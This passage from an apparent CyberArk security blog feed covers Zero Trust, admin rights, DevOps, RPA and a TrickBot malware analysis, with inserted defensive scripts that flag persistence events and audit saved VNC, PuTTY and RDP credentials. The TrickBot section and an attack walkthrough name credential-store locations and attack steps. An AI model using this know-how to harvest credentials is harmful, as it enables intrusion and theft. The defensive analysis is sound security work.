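if __name__ == "__main__":
    for ev in (AccessEvent("alice", "L-1001", "BOS", "crm", 10, True),
               AccessEvent("alice", "X-9", "BOS", "crm", 10, False),
               AccessEvent("alice", "X-9", "ZZ", "crm", 3, False),
               AccessEvent("bob", "L-2002", "BOS", "crm", 10, False)):
        print(ev.user, decide(ev, PROFILES))
```

The mapping from risk band to action is the part the passage says IT should own; the baseline itself would in practice come from an analytics platform rather than a `Counter`, but the decision shape (score, band, action) is the same.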

Steps to Zero Trust

Now that we have the three pillars of a Zero Trust approach down, how do we go about piecing together a solution from products by various vendors, each purporting to solve one piece of the puzzle? Next up, we explore the steps to executing a Zero Trust approach. See how Idaptive Secures Access Everywhere.

______


Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Spotlight on Administrator Rights and Privileged Credential Theft https://www.cyberark.com/blog/spotlight-on-administrator-rights-and-credential-theft/ Thu, 30 May 2019 13:00:22 +0000 https://www.cyberark.com/?p=64956

You recognize the importance of defense-in-depth and use multiple layers of security to protect your organization’s most important data and assets. But, like many organizations, you could be overlooking a critical step in containing cyber attacks early in their lifecycle by failing to remove local administrator rights.

The Foundation of Effective Endpoint Security

Users with local admin rights have the power to do virtually anything they want on their workstations. They can download applications, use any program, modify system configurations and even access and change powerful administrative accounts. No matter how strong your perimeter security may be – even with DLP, antivirus and other security products – a user with local admin rights can easily supersede these defenses (either unintentionally or maliciously) and install anything from unlicensed software to unsanctioned applications and dangerous malware. Similarly, these powerful admin rights can be used by attackers to steal additional credentials, elevate privileges and move laterally through the network.

Identifying where local admin rights exist, and removing those rights, is a critical first step toward strong endpoint protection. Yet, CyberArk research shows that 87 percent of organizations have yet to do so, which suggests that employee demands for flexibility and productivity are largely trumping security hygiene best practices.

The Privileged Pathway: Endpoint Attack Simulation

We recently held a webinar to shine a light on these endpoint security risks and explore common attack methods. Following are steps in an example attack scenario to illustrate the power of local administrator rights. To view the full simulation, tune in on-demand.

  1. Phishing Attack to Land on a Workstation

Attackers have myriad ways to launch their attacks – from crafty phishing attempts via emails to drive-by downloads to physical USB insertions. In this particular example, we showed how criminals often do their “homework” by reverse-engineering social media sites to gain information about their potential victims. Here, the attacker scoured LinkedIn, crafted a convincing email on commission reports, and sent it to a number of salespeople within an organization.

[Figure 1: Phishing email used to gain initial foothold.]


  2. Stealthy Command and Control Communication

It’s not long before an unsuspecting salesperson reads a seemingly legitimate email, opens the attachment, and enables macros to read its contents. With this, the attacker can launch an agent (a program that maintains a connection between the attacker’s device and the compromised host) that communicates back to their command and control server. In this instance, the attacker uses PowerShell Empire, a post-exploitation framework for computers and servers running Microsoft Windows or Windows Server operating systems.

[Figure 2: PowerShell Empire.]


This agent is running as a standard user, so the attacker’s next step is to try to locate and steal administrator rights. By entering just three simple command sets, the attacker is able to locate those local admin rights and generate a new agent by using them. The attacker now has full control over the user’s machine – as both a standard user and as an admin. With full admin controls, the attacker can easily see which security tools are in place (e.g. antivirus and DLP) and begin turning them off to avoid detection.

[Figure 3: Full machine takeover.]


  3. Ongoing Reconnaissance

Information gathering happens during the attacker’s initial target research and throughout the attack lifecycle. Once attackers have control of a machine, they can ramp up their investigation and use local admin rights to build persistence by creating scheduled tasks, modifying registry values or launching new services. This way, any time the machine reboots, the agent will as well, making it very easy for the attacker to make their way around the system.
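Each of the persistence mechanisms named above (scheduled tasks, registry changes, new services), and the local Administrators group change that typically precedes them, is recorded by Windows: Security event 4732 (member added to a security-enabled local group), 4698 (scheduled task created), 4657 (registry value modified, when object auditing is enabled) and System event 7045 (service installed). The following is an added example, not from the webinar or from CyberArk, of detection logic run over constructed sample records in a simplified JSON-lines form; the event IDs are the standard Microsoft ones, the field names and the host, user, task and path values are constructed for the example.

```python
"""Flag local-admin grants and persistence artefacts in Windows event data.

Added example; the sample events below are constructed, simplified
renderings of Security/System log records. Event IDs are Microsoft's.
"""
import json

EVT_LOCAL_GROUP_MEMBER_ADDED = 4732   # Security: member added to local group
EVT_SCHEDULED_TASK_CREATED = 4698     # Security: scheduled task created
EVT_REGISTRY_VALUE_MODIFIED = 4657    # Security: registry value modified
EVT_SERVICE_INSTALLED = 7045          # System: a service was installed

# Autostart registry locations (compared case-insensitively).
RUN_KEY_MARKERS = ("\\currentversion\\run", "\\currentversion\\runonce")
# Service binaries are expected under these roots; anything else is flagged.
TRUSTED_SERVICE_ROOTS = ("c:\\windows\\", "c:\\program files")

# Constructed sample input: one host, one user, plus a benign line and junk.
SAMPLE_LINES = [
    r'{"event_id":4624,"host":"WS-SALES-07","subject":"jdoe"}',
    r'{"event_id":4732,"host":"WS-SALES-07","subject":"jdoe","group":"Administrators","member":"WS-SALES-07\\jdoe"}',
    r'{"event_id":4698,"host":"WS-SALES-07","subject":"jdoe","task_name":"\\Updater","command":"C:\\Users\\jdoe\\AppData\\Roaming\\svc.exe"}',
    r'{"event_id":7045,"host":"WS-SALES-07","service_name":"WinHelperSvc","image_path":"C:\\Users\\Public\\helper.exe"}',
    r'{"event_id":7045,"host":"WS-SALES-07","service_name":"VendorAgent","image_path":"C:\\Program Files\\Vendor\\agent.exe"}',
    r'{"event_id":4657,"host":"WS-SALES-07","subject":"jdoe","object":"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run","value_name":"svc","new_value":"C:\\Users\\jdoe\\AppData\\Roaming\\svc.exe"}',
    'this line is not json and must be skipped',
]


def parse_events(lines):
    """Decode JSON lines, silently dropping malformed or non-object lines."""
    events = []
    for line in lines:
        try:
            obj = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(obj, dict) and "event_id" in obj:
            events.append(obj)
    return events


def analyze(events):
    """Return one alert dict per matching event."""
    alerts = []
    for ev in events:
        eid, host = ev.get("event_id"), ev.get("host", "?")
        if eid == EVT_LOCAL_GROUP_MEMBER_ADDED and ev.get("group") == "Administrators":
            alerts.append({"rule": "local_admin_granted", "host": host,
                           "detail": f"{ev.get('member')} added by {ev.get('subject')}"})
        elif eid == EVT_SCHEDULED_TASK_CREATED:
            alerts.append({"rule": "scheduled_task_created", "host": host,
                           "detail": f"{ev.get('task_name')} -> {ev.get('command')}"})
        elif eid == EVT_SERVICE_INSTALLED:
            path = ev.get("image_path", "").lower()
            if not path.startswith(TRUSTED_SERVICE_ROOTS):
                alerts.append({"rule": "suspicious_service_path", "host": host,
                               "detail": f"{ev.get('service_name')} -> {ev.get('image_path')}"})
        elif eid == EVT_REGISTRY_VALUE_MODIFIED:
            obj = ev.get("object", "").lower()
            if any(marker in obj for marker in RUN_KEY_MARKERS):
                alerts.append({"rule": "run_key_modified", "host": host,
                               "detail": f"{ev.get('value_name')} = {ev.get('new_value')}"})
    return alerts


PERSISTENCE_RULES = {"scheduled_task_created", "suspicious_service_path", "run_key_modified"}


def correlate(alerts):
    """Hosts where an admin grant and a persistence artefact both appeared."""
    by_host = {}
    for a in alerts:
        by_host.setdefault(a["host"], set()).add(a["rule"])
    return sorted(h for h, rules in by_host.items()
                  if "local_admin_granted" in rules and rules & PERSISTENCE_RULES)


if __name__ == "__main__":
    found = analyze(parse_events(SAMPLE_LINES))
    for a in found:
        print(a["host"], a["rule"], a["detail"])
    print("privileged persistence chain on:", correlate(found))
```

The correlation step is the point: any one of these events can be routine administration, but an Administrators-group change followed on the same host by a new autostart entry, task or out-of-place service is the pathway the webinar describes, and that pairing is what deserves a ticket.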

  4. Privilege Escalation and Lateral Movement

Once the attacker lands on a workstation, they look to steal passwords to move laterally until they find privileged credentials that enable powerful access to target systems and assets. By stealing and utilizing legitimate credentials, attackers can persist on the network for an average of 78 days without being detected. This gives attackers ample time to seek out target systems and carry out their mission.

[Figure 4: The privileged pathway.]


Credential Theft Plays a Major Part in Nearly All Targeted Attacks

While removing local admin rights greatly reduces the potential attack surface – it’s not the end of the story. Many credential theft attacks can be fully executed from a single user’s workstation by leveraging credentials stored on the device – from passwords for corporate social media accounts to administrative credentials stored in IT applications and remote access tools. These credential theft attacks have four (disturbing) things in common:

  1. They do not require admin rights to compromise credentials
  2. They are very easy to execute and well documented
  3. They are based on exploiting passwords stored in popular password storage locations such as DPAPI, Google Chrome, Filezilla and WinSCP
  4. There are numerous methods and effective tools available to attackers, such as the LaZagne Project

Advanced protection beyond the foundational admin rights removal step is needed to effectively detect and block attempted theft of Windows credentials and those stored by popular web browsers.

CyberArk Endpoint Privilege Manager helps organizations reduce risk by eliminating unnecessary local admin privileges, blocking credential theft attempts, auditing malicious behavior and strengthening the security of privileged accounts. Used in tandem with existing endpoint security tools, the CyberArk solution can dramatically strengthen protection and detection capabilities, without impacting business operations and productivity.

To learn more about CyberArk Endpoint Privilege Manager, download our solution brief and be sure to attend the full webinar, Spotlight on Administrator Rights and Privileged Credential Theft.


]]>
Version 10.9 Extends Security to Privileged Business Users https://www.cyberark.com/blog/version-10-9-extends-security-to-privileged-business-users/ Thu, 23 May 2019 13:00:59 +0000 https://www.cyberark.com/?p=63900

We recently announced version 10.9 of the CyberArk Privileged Access Security Solution. This release is the first enterprise-grade Privileged Access Management (PAM) solution to add functionality to extend security and credential protection for privileged business users, as well as delivering greater flexibility to reduce privilege-related risk across the enterprise.

It’s well known that social engineering and phishing attacks are the most common form of cyberattack and that business leaders are often targeted by malicious attackers because they frequently have advanced access and are not directly in the purview of IT and security teams. While business leaders don’t typically have access to IT infrastructure and assets that would fall under the purview of IT and security administrators, they do require access to data, especially sensitive data, that are highly sought after. A few examples to consider:

  • A VP of Sales has access to sales pipeline figures, bookings, customer information and a whole lot more through their Customer Relationship Management tools. Sales and marketing teams rely on this information to inform their boards, partners and analysts.
  • An HR Administrator has access to employee information like performance reviews, time off requests and health care information — all of which is confidential. This data is typically stored in an HR specific business application like SuccessFactors, Zenefits or Namely.
  • A company’s CFO has the right to view information like W2s, company bookings and revenue projections, all information that can sway stock prices, cause employee tension and disrupt business.

Typically, these leaders are on the move, busy and crunched for time, all of which contributes to increased risk. Business leaders’ passwords are often repeated across platforms and not rotated nearly often enough because the process of creating new passwords for each application and account is too time consuming. They also typically don’t store passwords as securely as they should, either because they don’t trust the platforms their organizations use or they aren’t as familiar with operating them as the IT side is. As a result, these passwords can often be found in places like spreadsheets, basic password managers and the ever-dreaded Post-It Note.

Using CyberArk’s best-of-breed privileged access management infrastructure and security capabilities as a backdrop, the latest version of the CyberArk solution can now securely store, show and copy passwords used by business leaders and other non-IT users accessing business websites and applications.

Protect non-IT users’ access to sensitive information contained on business websites and applications.

This release also introduces Privilege Management and Application Control Inbox workflows, which are now available for macOS events within the CyberArk Endpoint Privilege Manager solution. This allows customers to collect, monitor and build policies on every launch and centrally manage permission requests from managed macOS machines.

Version 10.9 is available now. To learn more, click here!

]]>
Five Key Steps to Bring DevOps and Security Teams into Alignment https://www.cyberark.com/blog/five-key-steps-to-bring-devops-and-security-teams-into-alignment/ Tue, 21 May 2019 13:00:32 +0000 https://www.cyberark.com/?p=63157

Editor’s Note: Part 1 of a 5 Part series on securing DevOps environments based on insights from Global 1000 CISOs. This installment covers how to bring DevOps and security teams into alignment.

Securing DevOps environments is an increasingly important concern for Chief Information Security Officers (CISOs) and security teams. Earlier this year, we published The CISO View – Protecting Privileged Access in DevOps and Cloud Environments. The report established a series of recommendations based on insights gained from a diverse panel of expert CISOs from Global 1000 organizations. Contributors to the report include executives from ING Bank, CIBC, Rockwell Automation, Lockheed Martin, Starbucks, Pearson, Asian Development Bank, American Express, NTT Communications, Carlson Wagonlit Travel, Orange Business Services, American Financial Group (AFG) and GIC Private Limited.

In this five-part blog series, we’ll expand on the guidance for each of the five recommendations highlighted in the CISO View report, with the goal of helping security teams leverage these experiences and apply them to their own environments to improve DevOps security.

  1. Transform the security team into DevOps partners
  2. Prioritize securing DevOps tools and infrastructure
  3. Establish enterprise requirements for securing secrets and credentials
  4. Adapt processes for application testing
  5. Evaluate the results

Transform the Security Team into a DevOps Partner – Part one of the series will address how organizations can bring their DevOps and security teams into alignment and establish collaboration for stronger overall security.

While developers often recognize that security is important, it is not their top priority. More typically, the DevOps team prioritizes delivering new capabilities and features to the business and customers, often as part of a larger digital transformation initiative. And developers often view security as something that will slow down deployments.

Security teams often have limited DevOps knowledge or expertise. Too often the result is that DevOps adoption begins and even takes hold inside an organization before the security team really gets involved. Consequently, security vulnerabilities are not always adequately addressed in DevOps environments, which can drive unnecessary risk.

As the CISO View report points out, it’s important for the security team to take the lead in integrating security into the DevOps processes before poor practices become entrenched.

So, how can security teams better engage, energize and collaborate with their DevOps counterparts to strike the right balance? The following five tips summarize the panel’s guidance for transforming security teams into DevOps partners:

  1. Establish the requisite skills to get in the driver’s seat. Effective collaboration requires effective communication. While developers write the actual code, it’s important for security teams to gain knowledge about programming languages along with how applications are built, tested and deployed automatically. This will help them have more meaningful discussions and credible conversations. Security professionals can start by learning some of the fundamentals: PowerShell, Python, and Rust, as well as how DevOps tools use REST calls and containerization technologies – particularly Docker and Kubernetes.
  2. Make it easy for developers to do the right thing. As one CISO View contributor noted, “You can’t be the manual cog in their completely automated process.” Make it easy for developers to do the right thing by training them in secure coding practices and implementing a self-service model for security capabilities. For example, you could provide security policy as code that can be integrated into the developers’ automated processes.
  3. Establish effective ways to collaborate. Set up formal systems to ensure DevOps practitioners understand security risks and implement good security practices across the organization. Consider how best to deploy security resources into existing or new organizational models and structures. The report outlines approaches to improving DevOps security, which include establishing centers of excellence, community leaders, security champions and embedding security team members inside development teams.
  4. Get developers to think like attackers. Educate DevOps teams on specific attacker tactics, show how sample code modules could expose secrets and provide examples as user stories. For example, “As an attacker, I would scan the organization’s code repositories looking for secrets.” Take the team through a penetration testing exercise or engage a Red Team to demonstrate how an attacker would compromise a CI/CD pipeline.
  5. Adopt Agile and DevOps methods. Security should begin utilizing Agile and DevOps methods within their own teams, not only to gain a deeper understanding of DevOps methodologies, but also to achieve greater efficiency by automating tasks or delivering capabilities in smaller increments more frequently.

The bottom line – understanding how other enterprises approach secrets management challenges across DevOps and cloud environments can help encourage collaboration and help fast-track the security team’s own efforts.

Next Steps – Check back in the coming weeks: in part 2 we’ll take a closer look at how to prioritize securing DevOps tools and infrastructure.

You can also download The CISO View report in full, watch a two-minute animated video that highlights the report’s top five recommendations or watch a related webinar.


]]>
The Business Case for Securing Robotic Process Automation https://www.cyberark.com/blog/the-business-case-for-securing-robotic-process-automation/ Thu, 16 May 2019 13:00:10 +0000 https://www.cyberark.com/?p=62831

As part of their ongoing digital transformation journeys, enterprises are turning to Robotic Process Automation (RPA) to enhance efficiency and productivity. According to Deloitte, 53 percent of organizations have started to leverage RPA to robotize and automate repetitive tasks to allow the human workforce to focus on higher value work, accelerate business value and increase process scalability. RPA adoption is expected to increase to 72 percent in the next two years and, if adoption continues at its current level, RPA will achieve near-universal adoption within the next five years.

Building the Business Case for RPA Privileged Access Management

As organizations consider RPA, CISOs and security leaders have a timely opportunity to drive conversations with the business about the value of applying strong cybersecurity to this transformative technology, and related business outcomes. Here are three ways to build the business case for RPA security – centered on protecting privileged access:

  • Reduced risk = additional cost savings. Though current industry estimates on RPA cost savings vary – from 25 to 50 percent – the ROI is undeniable. The Deloitte study points to total ROI in less than 12 months, with significantly improved compliance, quality, accuracy, productivity and cost reduction. But to realize the full financial promise of RPA, security must be built in from the start. Monitoring and protecting the privileged pathway is the first and most critical step in securing RPA workflows. This prevents unauthorized users from gaining access to data processed by RPA software robots, and stops malicious insiders and external attackers from progressing their attack.
  • Greater operational efficiency. Approximately 10 to 20 percent of all human work hours are spent on repetitive computer tasks. RPA helps automate much of this manual “hand work” involved in daily business, such as entering data (like invoices and POs) from one application into another. Implementing privileged access management (PAM) for RPA not only drives down risk, but also extends automation to the management and rotation of software robot privileged credentials. This helps IT operations teams streamline processes and improve operational efficiency. By refocusing these teams on less laborious, more business-critical, intellectually stimulating tasks, organizations can motivate employees, reduce stress, spark interest and job satisfaction and reduce employee burnout and churn.
  • Simplified compliance: RPA minimizes human access to sensitive data, which can reduce risk and compliance issues. However, RPA requires a host of new non-human “robots” that need privileged access to connect to sensitive systems and information, opening the door to new compliance challenges. A strong, centralized privileged access management solution can dramatically simplify audit reporting by automating the enforcement of privileged access policies and providing complete visibility into “who,” “when,” “why” and “what” took place during privileged sessions.

The clear business benefits of a strong privileged access management program can be realized across numerous digital transformation initiatives – from RPA and cloud to DevOps. Effectively conveying the value of privileged access management in enhancing the business will help in gaining critical executive support and obtaining necessary budget and resources. From there, executive leadership can help rally employees to make it an organizational priority, impart a sense of urgency and ownership, and prevent it from being derailed.

Robotic Process Automation: Expanding the Cyber Attack Surface

Despite its many benefits, RPA can introduce significant new security risks and expand an organization’s overall attack surface. Consider that, in a typical enterprise RPA deployment, an organization may utilize thousands of software robots in production, which are activated and deactivated on-demand. These robots can perform a huge number of automated, functional tasks every hour – or even every minute. (For a deeper dive on this, check out our on-demand webinar “The Power and Potential of Robotic Process Automation.”) Each one of these software robots requires privileges to connect to target systems and applications to perform assigned duties. If these non-human credentials are left unsecured, they become ripe targets. Attackers can compromise these valuable credentials to move laterally and advance their attack. Given the number of bots deployed in production at any given moment, these unsecured credentials can expand the attack vector exponentially.

All of this means that as organizations embrace RPA, security teams must manage and protect privileged credentials for these robots just as they would any other privileged user or process.

Robotic Process Automation Privileged Access Management in Action: CyberArk and UiPath

Today, CyberArk delivers more out-of-the-box integrations with top RPA solutions and secures more in-production deployments than any other privileged access management vendor. One such integration is with UiPath, which enables organizations to implement privileged access management controls directly into their RPA workflows and processes, and ultimately, deliver greater business value.

The integrated solution centrally stores and manages all Windows domain login credentials via UiPath’s Orchestrator (part of the UiPath Enterprise RPA Platform, which provides centralized scheduling, management and monitoring capabilities for all software robots) and all other non-Windows credentials directly through the CyberArk Privileged Access Security Solution. Software bots can securely retrieve the required credentials prior to performing automated tasks. For a full demo, check out this on-demand webinar.

Interested in learning more about how you can reap the full benefits of RPA solutions while reducing privilege-related risk?  Watch this two-minute CyberArk video and contact us today.


]]>
Passwords are Just One Piece of the Cybersecurity Puzzle https://www.cyberark.com/blog/passwords-are-just-one-piece-of-the-cybersecurity-puzzle/ Wed, 15 May 2019 19:26:53 +0000 https://www.cyberark.com/?p=98916

To achieve Zero Trust security, “never trust, always verify” must extend beyond users to their devices as well. In a previous post, I described the importance of the first step in Zero Trust — the verifying of every user who logs in.

Once you have verified that people are who they say they are, you must also consider the device from which they connect. Is it a known device that’s associated with the user? And then, more importantly, is it in a good security posture?

To ensure real safety, every device must be validated before granting access. To do that, we must first assess how users gain access through their devices today.

“What’s The Password?”

Today, nearly everyone locks their devices with some kind of password. That’s unequivocally a great thing, but it’s still important to keep in mind two universal truths about passwords: 1) they’re not all created equal, and 2) they’re just one piece of the cybersecurity puzzle.

In looking at the first, there’s tons of evidence supporting the idea that passwords are only as good as the user. I’ve said this before many times, but 81% of breaches involve weak and stolen passwords. So how does that happen?

A recent study found that millions of people are using easy-to-guess passwords on sensitive accounts. From popular sports teams to musicians — and classics like “123456” and “qwerty” and the all-time great “password” — users do a terrible job of choosing secure passwords.

Now, this doesn’t paint the full picture, and it’s not entirely their fault. When you add the context that the average business user today manages upwards of 200 passwords, it’s not so hard to believe there might be some cut corners somewhere.

So, if not all passwords are created equal, then what are the other pieces of the cybersecurity puzzle needed to keep users safe?

Beyond Passwords

The first step to more secure access is ensuring that users are logging into their device with more than simply a password. Devices need to also have some kind of adaptive multi-factor authentication (MFA) to go along with that password.

An additional layer of security can be applied when these MFA-supported passwords are coupled with some level of device and app management to confirm the right policies and lock them in place. It’s even possible for Next-Gen Access technology to score the “riskiness” of that device under certain conditions — such as where it’s used, what browser it has, etc. — to make a safe (and more informed) access decision.

It’s the combination of these things that allows us to know that the device is associated with an end-user, and it’s in a trustworthy state. However, we’re not done there. For all of the pieces of a Zero Trust model to come together, we must intelligently limit their access. Our next blog will tackle how to make sure users only have access to what they need.


Read the Zero Trust series here:

Zero Trust Series – 1 What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Trickbot Update: From Credential Theft to Business Disruption https://www.cyberark.com/blog/trickbot-update-from-credential-theft-to-business-disruption/ Tue, 14 May 2019 13:19:06 +0000 https://www.cyberark.com/?p=62734

Researchers recently discovered a new variant of the original Trickbot that turns the banking Trojan into a remote application credentials thief. Developed in 2016, the original TrickBot was one of the more recent banking Trojans, with many of its original features inspired by Dyreza (another banking Trojan), though Trickbot can also steal from Bitcoin wallets.

The original Trickbot’s main capabilities include harvesting emails and credentials using the Mimikatz tool. However, Trickbot’s authors show an extraordinary ability to constantly add new features and developments – and auto-update the infected machines with the new releases.

The newest variants of the malware should give the security-ops team something to watch out for. The previous Trickbot module included a password-grabbing module, but the latest variant takes application credentials theft a step further.

The new variant of Trickbot is somewhat similar to the previous version discovered in 2018. However, the updated version adds some new functionality, mainly in the remote desktop space. The new features target Virtual Network Computing (VNC), PuTTY and the Remote Desktop Protocol (RDP). There is no doubt that the TrickBot authors are agile and creative, and this is what makes this specific banking Trojan so dangerous.

Infection Vectors

TrickBot is typically spread via malicious spam (malspam) campaigns—for instance, spear phishing emails disguised as unpaid invoices or requests to update account information. Other methods of propagation include embedded URLs and infected attachments, such as Microsoft Word documents, and Excel files regarding tax returns with macros enabled. TrickBot is also seen as a secondary infection dropped by Emotet. And, with the help of those stolen NSA exploits that keep proving their worth, once it has infected a single endpoint, TrickBot can then spread laterally through the network using the SMB vulnerability (MS17-010), which includes either the EternalBlue, EternalRomance or EternalChampion exploit.

VNC: To grab VNC credentials, the pwgrab module searches for files matching the “*.vnc.lnk” pattern, which are usually located in the following directories:

  • %APPDATA%\Microsoft\Windows\Recent
  • %USERPROFILE%\Documents, %USERPROFILE%\Downloads

The stolen information includes the target machine’s hostname, port and proxy settings.

PuTTY:  To retrieve the PuTTY credentials, Trickbot probes the registry key Software\SimonTatham\Putty\Sessions to identify the saved connection settings. This allows the module to retrieve information, such as the Hostname and Username, and Private Key Files used for authentication.

RDP: Trickbot’s third function uses the CredEnumerateA API to identify and steal stored credentials. It then parses the string “target=TERMSRV” to identify the hostname, username and password saved for each RDP credential.
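To see what the three credential stores described above would expose on a given workstation, here is an added PowerShell audit script; it is example code written for this page, not code from the post or from TrickBot, and it only lists where saved VNC, PuTTY and RDP credentials exist, never their secrets. It assumes the standard PuTTY registry location under HKCU and the built-in cmdkey utility; the function names are this example's own.

```powershell
# Added example, not code from the original post: enumerate the three
# credential stores the TrickBot pwgrab module is described as reading, so a
# defender can see what a compromise of this endpoint would expose.
# Read-only; run as the user whose profile is being assessed.

function Get-VncShortcutExposure {
    # Saved VNC connections are *.vnc.lnk shortcuts; these are the folders the post names.
    $dirs = @(
        (Join-Path $env:APPDATA 'Microsoft\Windows\Recent'),
        (Join-Path $env:USERPROFILE 'Documents'),
        (Join-Path $env:USERPROFILE 'Downloads')
    )
    foreach ($d in $dirs) {
        if (Test-Path -LiteralPath $d) {
            Get-ChildItem -LiteralPath $d -Filter '*.vnc.lnk' -File -ErrorAction SilentlyContinue |
                ForEach-Object { [pscustomobject]@{ Store = 'VNC'; Item = $_.FullName } }
        }
    }
}

function Get-PuttySessionExposure {
    # PuTTY keeps saved sessions under this HKCU key (the post writes it as
    # Software\SimonTatham\Putty\Sessions); HostName, UserName and PublicKeyFile
    # are the values the module harvests.
    $key = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
    if (-not (Test-Path -LiteralPath $key)) { return }
    Get-ChildItem -LiteralPath $key | ForEach-Object {
        $p = Get-ItemProperty -LiteralPath $_.PSPath
        [pscustomobject]@{
            Store   = 'PuTTY'
            Item    = [uri]::UnescapeDataString($_.PSChildName)  # session names are URL-encoded
            Host    = $p.HostName
            User    = $p.UserName
            KeyFile = $p.PublicKeyFile
        }
    }
}

function Get-TermsrvCredentialExposure {
    # cmdkey /list reads the same Credential Manager store as CredEnumerateA;
    # saved RDP logons appear as "Target: Domain:target=TERMSRV/<host>".
    # No password is ever displayed; only the existence of the entry is reported.
    cmdkey /list 2>$null | ForEach-Object {
        if ($_ -match 'target=TERMSRV/(\S+)') {
            [pscustomobject]@{ Store = 'RDP'; Item = "TERMSRV/$($Matches[1])" }
        }
    }
}

function Get-TrickbotCredentialExposure {
    # Collect everything and count it per store so the result can feed a report.
    $findings = @(Get-VncShortcutExposure) + @(Get-PuttySessionExposure) + @(Get-TermsrvCredentialExposure)
    if (-not $findings) {
        Write-Output 'No saved VNC, PuTTY or RDP credentials found for this profile.'
        return
    }
    $findings | Group-Object Store | ForEach-Object {
        [pscustomobject]@{ Store = $_.Name; Count = $_.Count; Items = ($_.Group.Item -join '; ') }
    }
}

Get-TrickbotCredentialExposure | Format-Table -AutoSize
```

Any entry it reports is a credential that a pwgrab-style module would collect without needing to crack anything, which is the argument for moving such logons into a vault with short-lived retrieval rather than leaving them saved in the user profile.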

Business Disruption

It is most likely that the endpoint user will not notice any symptoms of a TrickBot infection. However, a network admin will see changes in traffic or attempts to reach out to blacklisted IPs and domains, since the malware will communicate with TrickBot’s command and control infrastructure to exfiltrate data and receive tasks.

TrickBot gains persistence by creating a Scheduled Task. Moreover, due to the way it uses the SMB vulnerability to spread through a company’s network, any infected machine on the network will re-infect cleaned machines when they rejoin the network.

Therefore, IT teams need to isolate, patch and remediate each infected machine one-by-one. This can be a long and painful process and costly in terms of time and resources. Much like with ransomware attacks, the best protection against a threat like TrickBot is to proactively prevent infection in the first place.

Understand Your Attacker

Most attacks today follow a similar pattern, and understanding this pattern is key to protecting sensitive data and systems from theft and compromise. Regardless of where an attack originates, skilled attackers will end up on the inside. (This applies beyond TrickBot.)

Before they can steal any data, they have to learn the network, locate the data and gain the privileged access necessary to exfiltrate it.

Once inside the network, attackers first look for access to an internal account, preferably one with administrative privileges. They then leverage the compromised privileged account to escalate their privileges in order to gain access to more of the network and move through it more freely. With the necessary privileges, attackers next carry out reconnaissance on the network to determine how to best reach the target. With an attack plan in place, attackers move laterally to get into a better position and further escalate their privileges until they successfully reach the target system – or systems – and begin exfiltrating sensitive data.

The “Traditional” Way to Prevent Infection

As with anything else, there are standard methods for preventing infection by malware like Trickbot. These include:

  • Use antivirus programs on clients and servers and automatically update signatures and software.
  • Disable all macros, except those that are digitally signed.
  • Apply appropriate patches and updates immediately after testing.
  • Implement filters at the email gateway to filter out emails with known malspam indicators, such as known malicious subject lines, and block suspicious IP addresses at the firewall.
  • If you do not have a policy regarding suspicious emails, create one and specify that all suspicious emails should be reported to the security or IT departments.
  • Implement Domain-Based Message Authentication, Reporting and Conformance (DMARC), a validation system that minimizes spam emails by detecting email spoofing using Domain Name System (DNS) records and digital signatures.
  • Mark external emails with a banner denoting that it comes from an external source. This will assist users in detecting spoofed emails.
  • Provide social engineering and phishing training to employees. Urge them not to open suspicious emails, click on links contained in such emails, post sensitive information online and to never provide usernames, passwords or personal information to any unsolicited request.
  • Teach users to hover over a link with their mouse to verify the destination prior to clicking on the link.

Still Got Infected? What’s Next?

Anti-virus software and intrusion detection systems alone can’t fully protect you from infection. This is what you need to do if it’s already too late and you’re infected:

  1. First, you need to spot the infected machine, which is not as easy as it sounds.
  2. Then, disconnect the infected machine from the network.
  3. Patch the machine for MS17-010.
  4. Disable administrative shares. (The most recent Trickbot variants, after querying the share and getting a list of all connected machines, use C$ with Admin credentials to move around and re-infect all the other endpoints.)
  5. Find a tool, such as Malwarebytes, that can remove TrickBot.
  6. Change account credentials. Repeated re-infections are an indication that Trickbot was able to guess or brute force the administrator password successfully. Change all local and domain administrator passwords.
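As an added example for the containment steps above (not code from the post or from any CyberArk product), this PowerShell script verifies on the isolated machine that SMBv1 is off and that the C$ and ADMIN$ shares are gone, optionally disabling the shares, and lists scheduled tasks that launch from user-writable paths, since a Scheduled Task is the persistence mechanism described. The user-writable-path heuristic and all function names are this example's own assumptions, and the SMBv1 check is a compensating control rather than proof that the MS17-010 update is installed.

```powershell
# Added example, not code from the original post: checks for steps 3 and 4 of
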